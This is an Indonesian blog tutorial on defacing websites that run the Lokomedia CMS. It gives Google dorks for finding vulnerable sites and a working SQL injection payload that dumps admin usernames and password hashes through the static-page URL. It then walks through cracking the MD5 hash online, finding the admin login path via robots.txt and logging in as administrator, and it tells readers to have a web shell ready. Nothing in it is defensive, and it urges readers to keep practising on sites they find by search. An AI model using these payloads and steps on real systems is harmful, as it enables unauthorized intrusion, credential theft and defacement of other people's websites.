-->
Load more

Cara Deface Website Dengan Menggunakan Lokomedia Terbaru

Shares ShareTweet
Cara Deface website

Cara Deface Website Dengan Menggunakan Lokomedia Terbaru-Hii sobat selamat datang di Pakar Tekno, kali ini admin akan berbagi sedikit tutorial mengenai cara Deface Website. Ohh iya sebelum lanjut tentu anda harus sudah mengetahui terlebih dahulu apa itu Deface.

Admin akan jelaskan sedikit, jadi Deface adalah sebuah kegiatan yang bersifat merusak, menerobos, atau ahkan sebuah penyerangan terhadap suatu website dengan tujuan merubah tampilan atau tujuan lainnya sesuai dengan kehendak Defacer ( Orang Yang Sedang Melakukan Kegiatan Deface ) Agar lebih jelas anda dapat mengunjungi pada artikel sebelumnya. Pengertian Deface dalam peretasan dan contohnya.


Cara Deface Website

Dalam tutorial Deface kali ini kita akan menggunakan Lokomedia, dan sebelum lanjut sebaiknya anda siapkan terlebih dahulu bahan bahan dibawah ini.

Bahan Bahan :
  • Dork : (inurl:/statis-1-profil.html ) ( inurl:/statis-2-profil.html) ( inurl:/statis-3-profil.html) 

Agar anda mendapat Dork yang lebih Vuln lagi dari Dork yang ada diatas, Dengan cara melakukan pengembangan pada Dork tersebut, caranya yaitu dengan merubah angka yang ada pada Dork tersebut.

  • Bahan kedua yaitu Shell, jika anda belum memiliki Shell sebaiknya anda membuatnya terlebih dahulu, ada banyak tutorial cara membuat Shell di Google.
  • Exploit, contohnya dibawah.
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Artikel Terkait: Cara Hack Wifi ID Tanpa Root Menggunakan Widpedia Tool

Cara Deface Website Dengan Menggunakan Lokomedia Terbaru

1. Langkah pertama. Seperti biasanya kita buka google terlebih dahulu, lalu paste atau masukkan Dork yang sudah admin siapkan diatas atau jika anda memiliki Dork sendiri silahkan masukkan saja, Kemudian pilih salah satu website yang memiliki dan menampilkan halaman statis website tersebut, contohnya seperti gambar dibawah.

cara Deface website

2. Langkah kedua, Jika sudah menemukan website target, silahkan lanjut kelangkah berikutnya. Dibawah ini adalah website target yang sudah admin temukan, perhatikan url disana tertulis (namawebsite.com/statis-1-profil.html) Itu artinya website tersebut menampilkan statis nya dan dapat kita lakukan Deface. Yang admin sensor warna merah itu adalah nama website target.

Cara Deface website


3. Langkah ketiga, Masukkan Exploit yang sudah admin cantumkan diatas, Exploit tersebut cantumkan setelah url " statis-1 " Maka hasilnya akan menjadi seperti dibawah ini.

 http://nama website.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html


Jika sudah tekan enter, maka secara otomatis akan muncul tab yang bertuliskan (<li>,admin,. . . .) Tab ini berada tepat diatas url, jika sudah tampil artinya username dan pasword website target sudah terbaca. Agar lebih jelas lihat gambar dibawah, dan untuk melihat dengan jelas username dan pasword tersebut silahkan anda tekan "Ctrl+U" jika di komputer/PC dan jika di Android silahkan tambahkan saja " View-Source " diawal url.


Cara Deface website

4. Langkah keempat, Jika anda sudah menekan " Ctrl+U " Maka akan tampil seperti gambar dibawah disana tertulis. Admin, 06..... nah itu dia Username dan pasword nya, tetapi itu bukan pasword aslinya itu haya tampilah dalam bentuk programan dan untuk mendapatkan pasword aslinya kita harus melakukan " Hash " pasword terlebih dahulu.

Cara Deface website


5. Langkah kelima, Saat nya melakukan " Hash " pasword dengan cara copy semua angka yang berada di samping kanan tulisan admin tadi, lalu lakukan Hash psword di  https://hashkiller.co.uk/md5-decrypter.aspx
Jika berhasil maka anda akan mendapatkan Username dan Pasword website tersebut, contohnya seperti gambar dibawah.

Cara Deface website


6. Langkah keenam, Kita cari dimana  tempat admin loginnya dengan cara

➤ Misalkan ini website target anda: http://namawebsite.com

Kita tambahkan saja /robots.txt di akhir urlnya maka akan jadi seperti ini http://namawebsite.com/robots.txt

Pada saat kita menambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
Silahkan anda lihat pada tulisan disallow, karna itu disallownya /adminw36 berarti halaman admin login ada di http://namawebsite.com/adminw36 

 Cara Deface website



7. Langkah ketujuh, sekarang kita coba login dengan username sama password yang sudah kita Hash tadi. halaman admin login ada disini http://namawebsite.com/adminw42 Jika sudah berhasil masuk maka tampilan nya akan seperti ini

Cara Deface website


8. Langkah ke delapan, Selamat anda sudah berhasil masuk sebagai admin di website http://namawebsite.com

Cara Deface website

Demikianlah tutorial Cara Deface Website Dengan Menggunakan Lokomedia Terbaru, jika ada petanyaan silahkan, dengan senang hati kami akan menjawab. Jika gagal teruslah berlatih dan perhatikan maksud dari setiap kalimat yang tertera, teruslah berlatih dan tetap fokuslah. Sebab admin juga tidak berhasil hanya dengan sekali coba, semoga bermanfaat dan bagikanlah untuk mereka yang membutuhkan.Terima kasih.

Tags

Shares ShareTweet

Hallo, Kami Akan Selalu Berupaya Untuk Selalu Memberikan Informasi Yang Anda Cari

Sedang Dibincangkan